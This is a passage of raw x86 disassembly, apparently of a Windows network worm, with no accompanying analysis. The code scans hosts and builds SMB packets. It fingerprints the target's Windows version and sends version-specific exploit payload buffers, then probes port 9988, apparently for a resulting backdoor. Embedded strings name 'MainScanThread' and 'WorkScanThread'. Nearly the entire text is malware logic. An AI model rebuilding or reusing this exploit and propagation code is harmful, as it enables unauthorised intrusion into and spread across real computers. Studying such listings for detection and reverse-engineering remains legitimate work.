push [ebp+var_4]
call sub_412230
loc_408C06: ; CODE XREF: sub_408BB0+1F�j
mov eax, esi
pop ebx
pop esi
pop edi
leave
retn 10h
sub_408BB0 endp
; ---------------------------------------------------------------------------
db 90h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408C10 proc near ; CODE XREF: sub_408DC0+264�p
; sub_408DC0+3ED�p ...
var_3C = word ptr -3Ch
var_3A = word ptr -3Ah
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
add esp, 0FFFFFFC4h
push edi
push esi
push ebx
mov [ebp+var_10], 2
push [ebp+arg_4]
call sub_40A308
or eax, eax
jz short loc_408C34
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
jmp short loc_408C3C
; ---------------------------------------------------------------------------
loc_408C34: ; CODE XREF: sub_408C10+19�j
push [ebp+arg_4]
call sub_40A31A
loc_408C3C: ; CODE XREF: sub_408C10+22�j
mov [ebp+var_C], eax
push [ebp+arg_8]
call sub_40A314
mov [ebp+var_E], ax
push 6
push 1
push 2
call sub_40A34A
mov [ebp+var_18], eax
mov [ebp+var_1C], 0
mov [ebp+var_38], 1
lea eax, [ebp+var_38]
push eax
push 8004667Eh
push [ebp+var_18]
call sub_40A326
mov [ebp+var_3C], 1
mov [ebp+var_3A], 0
push 4
lea eax, [ebp+var_3C]
push eax
push 80h
push 0FFFFh
push [ebp+var_18]
call sub_40A33E
push 10h
lea eax, [ebp+var_10]
push eax
push [ebp+var_18]
call sub_40A302
cmp eax, 0FFFFFFFFh
jnz loc_408D9B
call sub_40A2F0
cmp eax, 2733h
jnz loc_408DA4
mov [ebp+var_2C], 6
mov [ebp+var_28], 0
mov [ebp+var_34], 1
mov eax, [ebp+var_18]
mov [ebp+var_30], eax
lea eax, [ebp+var_2C]
push eax
push 0
lea eax, [ebp+var_34]
push eax
push 0
push 0
call sub_40A332
or eax, eax
jz loc_408D99
cmp eax, 0FFFFFFFFh
jz loc_408D99
loc_408D02: ; CODE XREF: sub_408C10+18F�j
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_20]
push eax
push [ebp+arg_0]
call sub_405100
mov esi, [ebp+var_20]
mov ebx, [ebp+var_24]
mov edi, 0FFh
loc_408D1D: ; CODE XREF: sub_408C10:loc_408D88�j
mov [ebp+var_2C], 6
mov [ebp+var_28], 0
mov [ebp+var_34], 1
mov eax, [ebp+var_18]
mov [ebp+var_30], eax
lea eax, [ebp+var_2C]
push eax
push 0
lea eax, [ebp+var_34]
push eax
push 0
push 0
call sub_40A332
or eax, eax
jz short loc_408D86
cmp eax, 0FFFFFFFFh
jz short loc_408D86
push 0
push edi
push esi
push [ebp+var_18]
call sub_40A338
cmp eax, 0FFFFFFFFh
jz short loc_408D82
sub ebx, eax
or ebx, ebx
jnz short loc_408D74
mov [ebp+var_1C], 1
jmp short loc_408D8A
; ---------------------------------------------------------------------------
loc_408D74: ; CODE XREF: sub_408C10+159�j
add esi, eax
cmp ebx, 0FFh
jnb short loc_408D88
mov edi, ebx
jmp short loc_408D88
; ---------------------------------------------------------------------------
loc_408D82: ; CODE XREF: sub_408C10+153�j
jmp short loc_408D8A
; ---------------------------------------------------------------------------
db 0EBh, 2
; ---------------------------------------------------------------------------
loc_408D86: ; CODE XREF: sub_408C10+13D�j
; sub_408C10+142�j
jmp short loc_408D8A
; ---------------------------------------------------------------------------
loc_408D88: ; CODE XREF: sub_408C10+16C�j
; sub_408C10+170�j
jmp short loc_408D1D
; ---------------------------------------------------------------------------
loc_408D8A: ; CODE XREF: sub_408C10+162�j
; sub_408C10:loc_408D82�j ...
push 8000h
push 0
push [ebp+var_20]
call sub_40A230
loc_408D99: ; CODE XREF: sub_408C10+E3�j
; sub_408C10+EC�j
jmp short loc_408DA4
; ---------------------------------------------------------------------------
loc_408D9B: ; CODE XREF: sub_408C10+9D�j
or eax, eax
jnz short loc_408DA4
jmp loc_408D02
; ---------------------------------------------------------------------------
loc_408DA4: ; CODE XREF: sub_408C10+AD�j
; sub_408C10:loc_408D99�j ...
push 2
push [ebp+var_18]
call sub_40A344
push [ebp+var_18]
call sub_40A2FC
mov eax, [ebp+var_1C]
pop ebx
pop esi
pop edi
leave
retn 0Ch
sub_408C10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408DC0 proc near ; CODE XREF: rdata:0040568D�p
var_258 = dword ptr -258h
var_254 = dword ptr -254h
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch
var_248 = dword ptr -248h
var_44 = dword ptr -44h
var_3C = byte ptr -3Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFDA8h
push edi
push esi
push ebx
mov [ebp+var_44], 0
push offset word_41AE7E
call sub_40A134
push [ebp+arg_0]
pop [ebp+var_258]
push [ebp+arg_0]
call sub_40A320
push eax
lea eax, [ebp+var_3C]
push eax
call sub_40A25A
push offset word_41AE7E
call sub_40A1C4
push offset dword_41BC90
call sub_40A1B8
lea edi, loc_41409A+1
push 0
push (offset loc_413FFF+1)
push (offset loc_413FFF+1)
lea eax, [ebp+var_3C]
push eax
call sub_411800
cmp eax, 0FFFFFFFBh
jnz short loc_408E31
jmp loc_409572
; ---------------------------------------------------------------------------
loc_408E31: ; CODE XREF: sub_408DC0+6A�j
cmp eax, 0FFFFFFFFh
jnz short loc_408E4B
push 0
push 0
push 0
lea eax, [ebp+var_3C]
push eax
call sub_411800
lea edi, loc_414072+1
loc_408E4B: ; CODE XREF: sub_408DC0+74�j
cmp eax, 0FFFFFFFBh
jnz short loc_408E55
jmp loc_409572
; ---------------------------------------------------------------------------
loc_408E55: ; CODE XREF: sub_408DC0+8E�j
cmp eax, 0FFFFFFFFh
jz short loc_408E80
mov [ebp+var_24C], eax
lea ecx, [eax+18Ah]
cmp dword ptr [ecx], 646E6957h
jz short loc_408E85
push [ebp+var_24C]
call sub_412230
jmp loc_409572
; ---------------------------------------------------------------------------
dw 5EBh
; ---------------------------------------------------------------------------
loc_408E80: ; CODE XREF: sub_408DC0+98�j
jmp loc_409061
; ---------------------------------------------------------------------------
loc_408E85: ; CODE XREF: sub_408DC0+AC�j
push (offset loc_41405F+2)
push [ebp+var_24C]
call sub_410F30
mov [ebp+var_250], eax
cmp eax, 0FFFFFFFFh
jnz short loc_408EB0
push [ebp+var_24C]
call sub_412230
jmp loc_409061
; ---------------------------------------------------------------------------
loc_408EB0: ; CODE XREF: sub_408DC0+DE�j
push edi
push [ebp+var_250]
call sub_411080
mov [ebp+var_254], eax
cmp eax, 0FFFFFFFFh
jnz short loc_408EE2
push [ebp+var_250]
call sub_412230
push [ebp+var_24C]
call sub_412230
jmp loc_409061
; ---------------------------------------------------------------------------
loc_408EE2: ; CODE XREF: sub_408DC0+105�j
push offset loc_4140A3
push [ebp+var_254]
call sub_4111E0
cmp eax, 0FFFFFFFFh
jnz short loc_408F12
push [ebp+var_250]
call sub_412230
push [ebp+var_24C]
call sub_412230
jmp loc_409061
; ---------------------------------------------------------------------------
loc_408F12: ; CODE XREF: sub_408DC0+135�j
mov edx, [ebp+var_24C]
lea ecx, [edx+18Ah]
mov [ebp+var_248], 0
cmp byte ptr [ecx+0Ah], 30h
jnz short loc_408F54
push 0
push 0
push 468h
push offset dword_4033B0
push 1Fh
push [ebp+var_254]
call sub_412840
mov [ebp+var_248], eax
jmp loc_409003
; ---------------------------------------------------------------------------
loc_408F54: ; CODE XREF: sub_408DC0+16C�j
cmp byte ptr [ecx+0Ah], 31h
jnz short loc_408F98
push 0
push 0
push 304h
push offset loc_403818
push 1Fh
push [ebp+var_254]
call sub_412840
push 0
push 0
push 304h
push offset loc_403818
push 1Fh
push [ebp+var_254]
call sub_412840
mov [ebp+var_248], eax
jmp short loc_409003
; ---------------------------------------------------------------------------
loc_408F98: ; CODE XREF: sub_408DC0+198�j
cmp byte ptr [ecx+8], 4Eh
jnz short loc_408FC1
push 0
push 0
push 468h
push offset dword_4033B0
push 1Fh
push [ebp+var_254]
call sub_412840
mov [ebp+var_248], eax
jmp short loc_409003
; ---------------------------------------------------------------------------
loc_408FC1: ; CODE XREF: sub_408DC0+1DC�j
cmp byte ptr [ecx+8], 53h
jnz short loc_409003
push 0
push 0
push 300h
push offset dword_403B1C
push 1Fh
push [ebp+var_254]
call sub_412840
push 0
push 0
push 300h
push offset dword_403B1C
push 1Fh
push [ebp+var_254]
call sub_412840
mov [ebp+var_248], eax
loc_409003: ; CODE XREF: sub_408DC0+18F�j
; sub_408DC0+1D6�j ...
cmp [ebp+var_248], 0FFFFFFFFh
jnz short loc_409035
push 7D0h
call sub_40A212
push 2704h
lea eax, [ebp+var_3C]
push eax
push offset word_41B10A
call sub_408C10
cmp eax, 1
jnz short loc_409035
mov [ebp+var_44], 1
loc_409035: ; CODE XREF: sub_408DC0+24A�j
; sub_408DC0+26C�j
push [ebp+var_254]
call sub_412230
push [ebp+var_250]
call sub_412230
push [ebp+var_24C]
call sub_412230
cmp [ebp+var_44], 1
jnz short loc_409061
jmp loc_409572
; ---------------------------------------------------------------------------
loc_409061: ; CODE XREF: sub_408DC0:loc_408E80�j
; sub_408DC0+EB�j ...
lea edi, loc_41408B+1
push 0
push (offset loc_413FFF+1)
push (offset loc_413FFF+1)
lea eax, [ebp+var_3C]
push eax
call sub_411800
cmp eax, 0FFFFFFFBh
jnz short loc_409086
jmp loc_409572
; ---------------------------------------------------------------------------
loc_409086: ; CODE XREF: sub_408DC0+2BF�j
cmp eax, 0FFFFFFFFh
jnz short loc_4090A0
push 0
push 0
push 0
lea eax, [ebp+var_3C]
push eax
call sub_411800
lea edi, loc_414072+1
loc_4090A0: ; CODE XREF: sub_408DC0+2C9�j
cmp eax, 0FFFFFFFBh
jnz short loc_4090AA
jmp loc_409572
; ---------------------------------------------------------------------------
loc_4090AA: ; CODE XREF: sub_408DC0+2E3�j
cmp eax, 0FFFFFFFFh
jz short loc_4090B7
mov [ebp+var_24C], eax
jmp short loc_4090BC
; ---------------------------------------------------------------------------
loc_4090B7: ; CODE XREF: sub_408DC0+2ED�j
jmp loc_4091EA
; ---------------------------------------------------------------------------
loc_4090BC: ; CODE XREF: sub_408DC0+2F5�j
push (offset loc_41405F+2)
push [ebp+var_24C]
call sub_410F30
mov [ebp+var_250], eax
cmp eax, 0FFFFFFFFh
jnz short loc_4090E7
push [ebp+var_24C]
call sub_412230
jmp loc_4091EA
; ---------------------------------------------------------------------------
loc_4090E7: ; CODE XREF: sub_408DC0+315�j
push edi
push [ebp+var_250]
call sub_411080
mov [ebp+var_254], eax
cmp eax, 0FFFFFFFFh
jnz short loc_409119
push [ebp+var_250]
call sub_412230
push [ebp+var_24C]
call sub_412230
jmp loc_4091EA
; ---------------------------------------------------------------------------
loc_409119: ; CODE XREF: sub_408DC0+33C�j
push (offset loc_4140B5+2)
push [ebp+var_254]
call sub_4111E0
cmp eax, 0FFFFFFFFh
jnz short loc_409149
push [ebp+var_250]
call sub_412230
push [ebp+var_24C]
call sub_412230
jmp loc_4091EA
; ---------------------------------------------------------------------------
loc_409149: ; CODE XREF: sub_408DC0+36C�j
mov edx, [ebp+var_24C]
lea ecx, [edx+18Ah]
mov [ebp+var_248], 0
cmp byte ptr [ecx+0Ah], 30h
jz short loc_40916B
cmp byte ptr [ecx+0Ah], 31h
jnz short loc_40918C
loc_40916B: ; CODE XREF: sub_408DC0+3A3�j
push 0
push 0
push 898h
push 403E1Ch
push 36h
push [ebp+var_254]
call sub_412840
mov [ebp+var_248], eax
loc_40918C: ; CODE XREF: sub_408DC0+3A9�j
cmp [ebp+var_248], 0FFFFFFFFh
jnz short loc_4091BE
push 7D0h
call sub_40A212
push 2704h
lea eax, [ebp+var_3C]
push eax
push offset word_41B10A
call sub_408C10
cmp eax, 1
jnz short loc_4091BE
mov [ebp+var_44], 1
loc_4091BE: ; CODE XREF: sub_408DC0+3D3�j
; sub_408DC0+3F5�j
push [ebp+var_254]
call sub_412230
push [ebp+var_250]
call sub_412230
push [ebp+var_24C]
call sub_412230
cmp [ebp+var_44], 1
jnz short loc_4091EA
jmp loc_409572
; ---------------------------------------------------------------------------
loc_4091EA: ; CODE XREF: sub_408DC0:loc_4090B7�j
; sub_408DC0+322�j ...
push 0
push (offset loc_413FFF+1)
push (offset loc_413FFF+1)
lea eax, [ebp+var_3C]
push eax
call sub_411800
cmp eax, 0FFFFFFFBh
jnz short loc_409209
jmp loc_409572
; ---------------------------------------------------------------------------
loc_409209: ; CODE XREF: sub_408DC0+442�j
cmp eax, 0FFFFFFFFh
jnz short loc_40921D
push 0
push 0
push 0
lea eax, [ebp+var_3C]
push eax
call sub_411800
loc_40921D: ; CODE XREF: sub_408DC0+44C�j
cmp eax, 0FFFFFFFBh
jnz short loc_409227
jmp loc_409572
; ---------------------------------------------------------------------------
loc_409227: ; CODE XREF: sub_408DC0+460�j
cmp eax, 0FFFFFFFFh
jz short loc_409234
mov [ebp+var_24C], eax
jmp short loc_409239
; ---------------------------------------------------------------------------
loc_409234: ; CODE XREF: sub_408DC0+46A�j
jmp loc_40938E
; ---------------------------------------------------------------------------
loc_409239: ; CODE XREF: sub_408DC0+472�j
push (offset loc_41405F+2)
push [ebp+var_24C]
call sub_410F30
mov [ebp+var_250], eax
cmp eax, 0FFFFFFFFh
jnz short loc_409264
push [ebp+var_24C]
call sub_412230
jmp loc_40938E
; ---------------------------------------------------------------------------
loc_409264: ; CODE XREF: sub_408DC0+492�j
push offset loc_414082
push [ebp+var_250]
call sub_411080
mov [ebp+var_254], eax
cmp eax, 0FFFFFFFFh
jnz short loc_40929A
push [ebp+var_250]
call sub_412230
push [ebp+var_24C]
call sub_412230
jmp loc_40938E
; ---------------------------------------------------------------------------
loc_40929A: ; CODE XREF: sub_408DC0+4BD�j
push (offset loc_4140DD+2)
push [ebp+var_254]
call sub_4111E0
cmp eax, 0FFFFFFFFh
jnz short loc_4092CA
push [ebp+var_250]
call sub_412230
push [ebp+var_24C]
call sub_412230
jmp loc_40938E
; ---------------------------------------------------------------------------
loc_4092CA: ; CODE XREF: sub_408DC0+4ED�j
mov edx, [ebp+var_24C]
lea ecx, [edx+18Ah]
mov [ebp+var_248], 0
cmp byte ptr [ecx+0Ah], 30h
jnz short loc_409309
push 0
push 0
push 63Fh
push offset dword_414AB4
push 4
push [ebp+var_254]
call sub_412840
mov [ebp+var_248], eax
jmp short loc_409330
; ---------------------------------------------------------------------------
loc_409309: ; CODE XREF: sub_408DC0+524�j
cmp byte ptr [ecx+0Ah], 31h
jnz short loc_409330
push 0
push 0
push 640h
push offset aEmutexa ; "eMutexA"
push 4
push [ebp+var_254]
call sub_412840
mov [ebp+var_248], eax
loc_409330: ; CODE XREF: sub_408DC0+547�j
; sub_408DC0+54D�j
cmp [ebp+var_248], 0FFFFFFFFh
jnz short loc_409362
push 7D0h
call sub_40A212
push 2704h
lea eax, [ebp+var_3C]
push eax
push offset word_41B10A
call sub_408C10
cmp eax, 1
jnz short loc_409362
mov [ebp+var_44], 1
loc_409362: ; CODE XREF: sub_408DC0+577�j
; sub_408DC0+599�j
push [ebp+var_254]
call sub_412230
push [ebp+var_250]
call sub_412230
push [ebp+var_24C]
call sub_412230
cmp [ebp+var_44], 1
jnz short loc_40938E
jmp loc_409572
; ---------------------------------------------------------------------------
loc_40938E: ; CODE XREF: sub_408DC0:loc_409234�j
; sub_408DC0+49F�j ...
push 0
push (offset loc_413FFF+1)
push (offset loc_413FFF+1)
lea eax, [ebp+var_3C]
push eax
call sub_411800
cmp eax, 0FFFFFFFBh
jnz short loc_4093AD
jmp loc_409572
; ---------------------------------------------------------------------------
loc_4093AD: ; CODE XREF: sub_408DC0+5E6�j
cmp eax, 0FFFFFFFFh
jnz short loc_4093C1
push 0
push 0
push 0
lea eax, [ebp+var_3C]
push eax
call sub_411800
loc_4093C1: ; CODE XREF: sub_408DC0+5F0�j
cmp eax, 0FFFFFFFBh
jnz short loc_4093CB
jmp loc_409572
; ---------------------------------------------------------------------------
loc_4093CB: ; CODE XREF: sub_408DC0+604�j
cmp eax, 0FFFFFFFFh
jz short loc_4093D8
mov [ebp+var_24C], eax
jmp short loc_4093DD
; ---------------------------------------------------------------------------
loc_4093D8: ; CODE XREF: sub_408DC0+60E�j
jmp loc_40952F
; ---------------------------------------------------------------------------
loc_4093DD: ; CODE XREF: sub_408DC0+616�j
push (offset loc_41405F+2)
push [ebp+var_24C]
call sub_410F30
mov [ebp+var_250], eax
cmp eax, 0FFFFFFFFh
jnz short loc_409408
push [ebp+var_24C]
call sub_412230
jmp loc_40952F
; ---------------------------------------------------------------------------
loc_409408: ; CODE XREF: sub_408DC0+636�j
push (offset loc_41407A+2)
push [ebp+var_250]
call sub_411080
mov [ebp+var_254], eax
cmp eax, 0FFFFFFFFh
jnz short loc_40943E
push [ebp+var_250]
call sub_412230
push [ebp+var_24C]
call sub_412230
jmp loc_40952F
; ---------------------------------------------------------------------------
loc_40943E: ; CODE XREF: sub_408DC0+661�j
push offset loc_4140CB
push [ebp+var_254]
call sub_4111E0
cmp eax, 0FFFFFFFFh
jnz short loc_40946E
push [ebp+var_250]
call sub_412230
push [ebp+var_24C]
call sub_412230
jmp loc_40952F
; ---------------------------------------------------------------------------
loc_40946E: ; CODE XREF: sub_408DC0+691�j
mov edx, [ebp+var_24C]
lea ecx, [edx+18Ah]
mov [ebp+var_248], 0
cmp byte ptr [ecx+0Ah], 30h
jnz short loc_4094AD
push 0
push 0
push 200Ch
push offset byte_4163BB
push 9
push [ebp+var_254]
call sub_412840
mov [ebp+var_248], eax
jmp short loc_4094D4
; ---------------------------------------------------------------------------
loc_4094AD: ; CODE XREF: sub_408DC0+6C8�j
cmp byte ptr [ecx+0Ah], 31h
jnz short loc_4094D4
push 0
push 0
push 0C88h
push offset byte_415733
push 9
push [ebp+var_254]
call sub_412840
mov [ebp+var_248], eax
loc_4094D4: ; CODE XREF: sub_408DC0+6EB�j
; sub_408DC0+6F1�j
cmp [ebp+var_248], 0FFFFFFFFh
jnz short loc_409506
push 7D0h
call sub_40A212
push 2704h
lea eax, [ebp+var_3C]
push eax
push offset word_41B10A
call sub_408C10
cmp eax, 1
jnz short loc_409506
mov [ebp+var_44], 1
loc_409506: ; CODE XREF: sub_408DC0+71B�j
; sub_408DC0+73D�j
push [ebp+var_254]
call sub_412230
push [ebp+var_250]
call sub_412230
push [ebp+var_24C]
call sub_412230
cmp [ebp+var_44], 1
jnz short loc_40952F
jmp short loc_409572
; ---------------------------------------------------------------------------
loc_40952F: ; CODE XREF: sub_408DC0:loc_4093D8�j
; sub_408DC0+643�j ...
lea eax, [ebp+var_3C]
push eax
call sub_4095A0
push 7D0h
call sub_40A212
push 2704h
lea eax, [ebp+var_3C]
push eax
push offset word_41B10A
call sub_408C10
cmp eax, 1
jnz short loc_409561
mov [ebp+var_44], 1
loc_409561: ; CODE XREF: sub_408DC0+798�j
cmp [ebp+var_44], 1
jz short loc_409572
push [ebp+var_258]
call sub_408440
loc_409572: ; CODE XREF: sub_408DC0+6C�j
; sub_408DC0+90�j ...
push offset dword_41BC90
call sub_40A1B2
cmp dword_41BC90, 0FF000000h
jbe short loc_409592
mov dword_41BC90, 0
loc_409592: ; CODE XREF: sub_408DC0+7C6�j
pop ebx
pop esi
pop edi
leave
retn 4
sub_408DC0 endp
; ---------------------------------------------------------------------------
db 8Dh, 0A4h, 24h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4095A0 proc near ; CODE XREF: sub_408DC0+773�p
var_6C = dword ptr -6Ch
var_64 = byte ptr -64h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFF94h
push edi
push esi
push ebx
mov [ebp+var_6C], 0FFFFFFFFh
push [ebp+arg_0]
lea eax, [ebp+var_64]
push eax
call sub_40A25A
push 0
lea eax, [ebp+var_64]
push eax
call sub_4114E0
mov edi, eax
cmp eax, 0FFFFFFFFh
jz short loc_4095FD
push edi
call sub_4096E0
push 107Eh
push 4046B4h
push edi
call sub_409610
cmp eax, 0FFFFFFFFh
jnz short loc_4095F0
mov [ebp+var_6C], 4
loc_4095F0: ; CODE XREF: sub_4095A0+47�j
push edi
call sub_40A2FC
mov [ebp+var_6C], 0
loc_4095FD: ; CODE XREF: sub_4095A0+2C�j
mov eax, [ebp+var_6C]
pop ebx
pop esi
pop edi
leave
retn 4
sub_4095A0 endp
; ---------------------------------------------------------------------------
db 8Dh
dd 24A4h, 0FF8B0000h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409610 proc near ; CODE XREF: sub_4095A0+3F�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push edi
push esi
push ebx
mov ebx, 20h
add ebx, 1Bh
add ebx, [ebp+arg_8]
add ebx, 6
mov esi, ebx
add esi, 200h
push esi
push 40h
call sub_40A1D0
mov edi, eax
mov esi, edi
add edi, 4
mov dword ptr [edi], 424D53FFh
mov byte ptr [edi+4], 73h
mov byte ptr [edi+9], 18h
mov word ptr [edi+0Ah], 807h
mov word ptr [edi+1Ah], 3900h
add edi, 20h
mov byte ptr [edi], 0Ch
mov byte ptr [edi+1], 0FFh
mov word ptr [edi+5], 1104h
mov word ptr [edi+7], 0Ah
mov word ptr [edi+9], 0
mov eax, [ebp+arg_8]
mov [edi+0Fh], ax
mov dword ptr [edi+15h], 800000D4h
mov eax, [ebp+arg_8]
mov [edi+19h], ax
add edi, 1Bh
push [ebp+arg_8]
push [ebp+arg_4]
push edi
call sub_40F5BF
add edi, [ebp+arg_8]
push 0Ah
push 0
push edi
call sub_40F5F0
push ebx
call sub_40A30E
mov [esi], eax
add ebx, 4
push 200h
push esi
push ebx
push esi
push [ebp+arg_0]
call sub_410DC0
mov edi, esi
add edi, 4
movzx ebx, word ptr [edi+5]
push esi
call sub_40A1D6
mov eax, ebx
pop ebx
pop esi
pop edi
leave
retn 0Ch
sub_409610 endp
; ---------------------------------------------------------------------------
dd 24A48Dh, 90000000h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4096E0 proc near ; CODE XREF: sub_4095A0+2F�p
var_718 = dword ptr -718h
var_714 = byte ptr -714h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = dword ptr -208h
var_204 = byte ptr -204h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFF8E8h
push edi
push esi
push ebx
mov [ebp+var_718], 0FFFFFFFFh
mov eax, ds:dword_414006
mov [ebp+var_4], eax
add [ebp+var_4], 3
add [ebp+var_4], 20h
push 200h
push 0
lea eax, [ebp+var_204]
push eax
call sub_40F5F0
lea esi, [ebp+var_204]
lea edi, [ebp+var_204]
push [ebp+var_4]
call sub_40A30E
mov [edi], eax
add edi, 4
mov dword ptr [edi], 424D53FFh
mov byte ptr [edi+4], 72h
mov byte ptr [edi+9], 18h
mov word ptr [edi+0Ah], 0C853h
mov word ptr [edi+1Ah], 3900h
add edi, 20h
mov eax, ds:dword_414006
mov [edi+1], ax
add edi, 3
push ds:dword_414006
push offset word_41400A
push edi
call sub_40F5BF
add [ebp+var_4], 4
push 0
push [ebp+var_4]
push esi
push [ebp+arg_0]
call sub_40A338
cmp eax, 0FFFFFFFFh
jnz short loc_409785
jmp short loc_4097FA
; ---------------------------------------------------------------------------
loc_409785: ; CODE XREF: sub_4096E0+A1�j
mov [ebp+var_20C], 6
mov [ebp+var_208], 0
mov [ebp+var_214], 1
mov eax, [ebp+arg_0]
mov [ebp+var_210], eax
lea eax, [ebp+var_20C]
push eax
push 0
push 0
lea eax, [ebp+var_214]
push eax
push 0
call sub_40A332
or eax, eax
jz short loc_4097F3
cmp eax, 0FFFFFFFFh
jz short loc_4097F3
push 0
push 200h
lea eax, [ebp+var_714]
push eax
push [ebp+arg_0]
call sub_40A32C
lea esi, [ebp+var_714]
add esi, 4
movzx eax, word ptr [esi+5]
jmp short loc_4097FA
; ---------------------------------------------------------------------------
loc_4097F3: ; CODE XREF: sub_4096E0+E7�j
; sub_4096E0+EC�j
mov eax, 0FFFFFFFFh
jmp short $+2
loc_4097FA: ; CODE XREF: sub_4096E0+A3�j
; sub_4096E0+111�j
pop ebx
pop esi
pop edi
leave
retn 4
sub_4096E0 endp
; ---------------------------------------------------------------------------
db 8Dh, 0A4h, 24h
align 8
dd 24A48Dh, 90000000h, 6E69614Dh, 6E616353h, 72656854h
db 64h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov edx, [ebp+10h]
mov ecx, [ebp+0Ch]
mov eax, [ecx+8]
mov [edx+0B8h], eax
mov eax, [ecx+0Ch]
mov [edx+0C4h], eax
mov eax, [ecx+10h]
mov [edx+0B4h], eax
mov eax, 0
leave
retn 0Ch
; ---------------------------------------------------------------------------
dw 9B8Dh
align 10h
dd 6B726F57h, 6E616353h, 65726854h
db 64h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov edx, [ebp+10h]
mov ecx, [ebp+0Ch]
mov eax, [ecx+8]
mov [edx+0B8h], eax
mov eax, [ecx+0Ch]
mov [edx+0C4h], eax
mov eax, [ecx+10h]
mov [edx+0B4h], eax
mov eax, 0
leave
retn 0Ch
; ---------------------------------------------------------------------------
dw 9B8Dh
align 10h
dd 2FBE8h, 80036800h, 55E80000h, 0E8000009h, 58Ch, 3F7E8h
dd 0B3026800h, 0F9E80041h, 68000008h, 41B31Ah, 8EFE8h
dd 0B3326800h, 0E5E80041h, 68000008h, 41B34Ah, 8DBE8h
dd 0B3626800h, 0D1E80041h, 68000008h, 41B906h, 20268h
dd 0A0CE800h, 0C00B0000h, 0EC850Fh, 5C70000h, 41BB70h
dd 94h, 41BB7068h, 8A0E800h, 0B5E80000h, 0E8FFFF9Bh, 0FFFF9B70h
dd 2 dup(6A006Ah), 7EDE8h, 0BC3CA300h, 5F70041h, 41473Ch
dd 10000000h, 3D831D74h, 41BB80h, 0E80A7502h, 0FFFF9E94h
dd 9DE9h, 0A09AE800h, 93E9FFFFh, 0F7000000h, 41473C05h
dd 0
dd 83177401h, 41BB803Dh, 7750200h, 0FF9EBBE8h, 0E877EBFFh
dd 79h, 5F770EBh, 41473Ch, 100000h, 3D831774h, 41BB80h
dd 0E8077502h, 0FFFF9BE8h, 0B1E854EBh, 0EBFFFFA0h, 3C05F74Dh
dd 4147h, 74000100h, 3BEE820h, 0C00B0000h, 3D833875h, 41BB80h
dd 0E8077502h, 0FFFF9D6Ch, 15E805EBh, 0EBFFFFA1h, 3C05F721h
dd 4147h, 74000010h, 803D8310h, 20041BBh, 0A9E80C75h, 0EBFFFF9Eh
dd 7E805h, 6A0000h, 755E8h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_4099E5 proc near ; CODE XREF: rdata:00403811�p
; rdata:0040392E�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push edi
push esi
push ebx
call sub_409ED0
push offset dword_41BAA0
push (offset loc_414778+1)
call sub_403400
cmp eax, 1
jnz short loc_409A0C
call sub_409C10
loc_409A0C: ; CODE XREF: sub_4099E5+20�j
push offset loc_41450E
push 1
push 0
call sub_40A11C
mov off_41BC24, eax
call sub_40A17C
or eax, eax
jz short loc_409A3A
push off_41BC24
call sub_40A0FE
push 0
call sub_40A13A
loc_409A3A: ; CODE XREF: sub_4099E5+41�j
push 0Ch
call sub_40A290
mov [ebp+var_8], eax
mov esi, eax
push 0
push 0
push 0
push 0
call sub_40A10A
mov [esi], eax
mov edi, 1
push offset byte_4149F7
push 0
push 4
call sub_40A1E2
or eax, eax
jz short loc_409AAD
push eax
call sub_40A0FE
lea eax, [ebp+var_4]
push eax
push 1
push 0
push 402C70h
push 0
push 0
call sub_40A128
mov [esi+8], eax
lea eax, [ebp+var_4]
push eax
push 1
push [ebp+var_8]
push offset unk_407700
push 0
push 0
call sub_40A128
push eax
call sub_40A0FE
mov edi, 4
loc_409AAD: ; CODE XREF: sub_4099E5+85�j
lea eax, [ebp+var_4]
push eax
push edi
push 0
push 402750h
push 0
push 0
call sub_40A128
mov [esi+4], eax
push 0FFFFFFFFh
push off_41BC3C
call sub_40A236
cmp off_41BC20, 0
jz short loc_409AF7
push 1
push 0
call sub_403970
push 3E8h
call sub_40A212
push 4
push 0
call sub_403970
loc_409AF7: ; CODE XREF: sub_4099E5+F4�j
push 0
call sub_40A13A
mov edi, edi
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
push edi
push esi
push ebx
push 0C8h
call sub_40A212
mov [ebp+var_10], 1
mov esi, [ebp+arg_0]
push dword ptr [esi]
pop [ebp+var_4]
push dword ptr [esi+8]
pop [ebp+var_8]
push dword ptr [esi+4]
pop [ebp+var_C]
push [ebp+arg_0]
call sub_40A296
loc_409B36: ; CODE XREF: sub_4099E5:loc_409B7F�j
push 36EE80h
push [ebp+var_4]
call sub_40A236
cmp [ebp+var_10], 0
jnz short loc_409B62
push [ebp+var_8]
call sub_40A1EE
push [ebp+var_C]
call sub_40A218
mov [ebp+var_10], 1
jmp short loc_409B7F
; ---------------------------------------------------------------------------
loc_409B62: ; CODE XREF: sub_4099E5+162�j
